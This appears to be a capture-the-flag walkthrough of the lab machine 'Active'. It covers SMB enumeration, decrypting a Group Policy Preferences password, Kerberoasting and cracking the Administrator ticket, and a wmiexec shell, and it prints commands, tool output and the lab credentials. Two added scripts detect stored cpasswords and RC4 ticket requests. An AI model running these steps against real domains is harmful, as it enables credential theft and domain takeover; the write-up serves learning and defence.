# Active - in Arabic

![](/files/-M__r4wntDnAOoKDk000)

## Recon

### nmap

```
nmap -sV -sC -p- 10.10.10.100
```

```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 07:46 EDT
Nmap scan report for 10.10.10.100
Host is up (0.41s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-13 12:43:47Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49172/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 33m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-05-13T12:44:51
|_  start_date: 2021-05-13T12:19:24

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1473.41 seconds

```

### SMB

smbmap & smbclient

```
smbmap -H 10.10.10.100
```

```
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS
```

We have READ ONLY on Replication, so let's take a look at it.

```
smbclient //10.10.10.100/Replication
```

```
Enter WORKGROUP\kali's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

                10459647 blocks of size 4096. 5728531 blocks available
smb: \> cd active.htb
smb: \active.htb\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 06:37:44 2018
  Policies                            D        0  Sat Jul 21 06:37:44 2018
  scripts                             D        0  Wed Jul 18 14:48:57 2018

                10459647 blocks of size 4096. 5728531 blocks available
```

We'll download everything, using these commands:

```
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
```

After downloading, I searched through the files and poked around a bit; eventually I reached Policies and, at the end, the file Groups.xml. As soon as I saw it I knew this was GPP, or Group Policy Preferences: a set of Group Policy settings that are applied on the user side (client-side), and they deliver configuration to the machines that are joined to the domain.

![](https://media.giphy.com/media/3otPoI68XRrUoQ5IQw/giphy.gif)

These can contain usernames and passwords, so if you go here

```
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
```

and open this file, you'll find this code:

```markup
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```

Notice the *name* and also the *cpassword*; it is encrypted with AES, so we need to break the encryption (crack it). We can use a tool called gpp-decrypt.py ([click here!](https://github.com/t0thkr1s/gpp-decrypt)).

```
python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
```

```
                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         

[ * ] Password: GPPstillStandingStrong2k18
```

And that's how we got a password. This is awesome by the way, you have to celebrate, my friend; try jumping out of the window.

![](https://media.giphy.com/media/Q3qzcQGOIOg1i/giphy.gif)

> CREDS: svc\_tgs:GPPstillStandingStrong2k18
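
As an added defender-side check (not part of the original write-up, and not the gpp-decrypt.py tool), the script below walks a copy of the Policies tree and reports every GPP file that still stores a cpassword, whatever the account attribute is called in that file type. Microsoft's MS14-025 patch stopped new cpassword values from being written but left existing ones in SYSVOL, which is why a tree like the one above is still worth auditing. It uses only the standard library; the sample files and the cpassword value are constructed.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Attribute that names the account a cpassword belongs to, per GPP file type: Groups.xml
# userName, ScheduledTasks.xml runAs, Services.xml accountName, Drives.xml/DataSources.xml username.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")

def find_cpasswords(policies_root):
    """Walk a Policies tree; return one finding per element with a non-empty cpassword."""
    findings = []
    for path in sorted(Path(policies_root).rglob("*.xml")):
        try:
            root = ET.parse(path).getroot()
        except ET.ParseError:
            continue  # not well-formed XML; a real audit should log this as well
        for elem in root.iter():
            cpw = elem.get("cpassword")
            if not cpw:
                continue  # attribute absent or empty: no stored secret in this element
            account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
            gpo = next((p for p in path.parts if p.startswith("{") and p.endswith("}")), "?")
            findings.append({"gpo": gpo, "file": path.name, "account": account,
                             "cpassword_len": len(cpw)})
    return findings

# Constructed sample files mirroring the write-up's layout; the cpassword is a made-up placeholder.
GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User name="active.htb\\SVC_TGS"><Properties action="U" userName="active.htb\\SVC_TGS"
    cpassword="Q29uc3RydWN0ZWRQbGFjZWhvbGRlck5vdFJlYWw="/></User>
</Groups>
"""
TASKS_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks><Task name="nightly"><Properties runAs="" cpassword=""/></Task></ScheduledTasks>
"""

def demo():
    """Build the sample tree in a temp dir and audit it."""
    root = Path(tempfile.mkdtemp())
    pref = root / "{31B2F340-016D-11D2-945F-00C04FB984F9}" / "MACHINE" / "Preferences"
    (pref / "Groups").mkdir(parents=True)
    (pref / "Groups" / "Groups.xml").write_text(GROUPS_XML, encoding="utf-8")
    (pref / "ScheduledTasks").mkdir()
    (pref / "ScheduledTasks" / "ScheduledTasks.xml").write_text(TASKS_XML, encoding="utf-8")
    return find_cpasswords(root)

if __name__ == "__main__":
    for f in demo():
        print(f"[!] {f['gpo']} {f['file']} stores a cpassword for {f['account']}")
```

The empty `cpassword=""` in the scheduled-task file is deliberately not reported, since an empty attribute holds no secret.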

### MSRPC

```
rpcclient -U "" -N 10.10.10.100
```

```
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
```

After seeing the `NT_STATUS_ACCESS_DENIED` message I figured there was no point going further, and honestly I didn't pay much attention to LDAP either, so I decided to go straight to the Get Access stage on the machine. Unfortunately that didn't work, so I went back to SMB with the creds we found.

### SMB with svc\_tgs

```
smbclient //10.10.10.100/Users -U 'svc_tgs'
```

```
Enter WORKGROUP\svc_tgs's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                10459647 blocks of size 4096. 5728499 blocks available
```

Of course I downloaded everything, just like we did before.

### So much time on DAT files

After downloading them, having finished everything above in under 10 minutes, I sat analysing these DAT files for about an hour, searching and reading, and in the end nothing came out of it, or at least I found nothing. Of course I had to move past it even though my heart was broken; you have to move on and go to the next stage.

### Kerberoasting

Let's go, Kerberoasting ❤

```
impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
```

If you happen to get an error message like this:

```
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
```

use this tool; the problem is time synchronisation between you and the target.

```
ntpdate 10.10.10.100
```

Anyway, we got the TGT:

```
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c823ffdcfd7b669bd5b854492702915f$...
```

We crack it with hashcat:

```
hashcat.exe -m 13100 admin_hash.txt rockyou.txt -d 1 # -d 1 to select my GPU
```

```
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c823ffdcfd7b669bd5b854492702915f$...:Ticketmaster1968
```

And that's how we got the last creds we need.

![](https://media.giphy.com/media/Mcvod8Hq2ymyPBXv4N/giphy.gif)

> CREDS: Administrator:Ticketmaster1968
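
The `$krb5tgs$23$` prefix on the hash above means an RC4-HMAC service ticket (etype 23, logged by the domain controller as Event 4769 with Ticket Encryption Type 0x17). As an added example from the detection side (not from the write-up or from Impacket), the script below triages constructed 4769 records and flags the pattern that `GetUserSPNs -request` leaves behind: a successful service-ticket request for a user (not computer, not krbtgt) service account with an RC4 ticket. The event lines are constructed in a simple key=value form, not real exported events; the matching mitigation is AES-only SPN accounts with long random passwords, or gMSAs.

```python
import re

RC4_HMAC = 0x17  # etype 23, the "23" in a $krb5tgs$23$ hashcat line
FIELD_RE = re.compile(r"(\w+)=(\S+)")

# Constructed Security-log records in key=value form (not real exported events).
SAMPLE_EVENTS = [
    "EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0",
    "EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0",
    "EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=svc_tgs ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0",
    "EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x1b",
]

def parse_event(line):
    """Turn one key=value record into a dict."""
    return dict(FIELD_RE.findall(line))

def krb5tgs_etype(hash_line):
    """Encryption type encoded in a hashcat $krb5tgs$<etype>$... line."""
    return int(hash_line.split("$")[2])

def is_kerberoast_candidate(ev):
    """Successful 4769 for a user (not computer, not krbtgt) service account, RC4 ticket."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return int(ev.get("TicketEncryptionType", "0"), 16) == RC4_HMAC

def triage(lines, threshold=1):
    """Map each requesting account to the service accounts it requested RC4 tickets for.
    One hit is enough on a domain where RC4 is otherwise unused; raise the threshold
    where legacy clients still request RC4 tickets legitimately."""
    per_user = {}
    for line in lines:
        ev = parse_event(line)
        if is_kerberoast_candidate(ev):
            per_user.setdefault(ev["TargetUserName"], []).append(ev["ServiceName"])
    return {user: svcs for user, svcs in per_user.items() if len(svcs) >= threshold}

if __name__ == "__main__":
    for user, svcs in triage(SAMPLE_EVENTS).items():
        print(f"[!] {user} requested RC4 service tickets for: {', '.join(svcs)}")
```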

## Get Access

Now, using the wmiexec tool, we can get onto the machine:

```
wmiexec.py 'active.htb/Administrator:Ticketmaster1968@10.10.10.100'
```

```
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator

C:\>
```

The wmiexec tool uses the WMI protocol, which is part of Microsoft's management toolset. It gives you a form of management and monitoring, mainly, and provides information about Windows systems; you can also write tooling and automation against it with things like VBScript and PowerShell.\
That's it for this one, bye!

*Happy Hacking*\
*MHZ-Cyber*

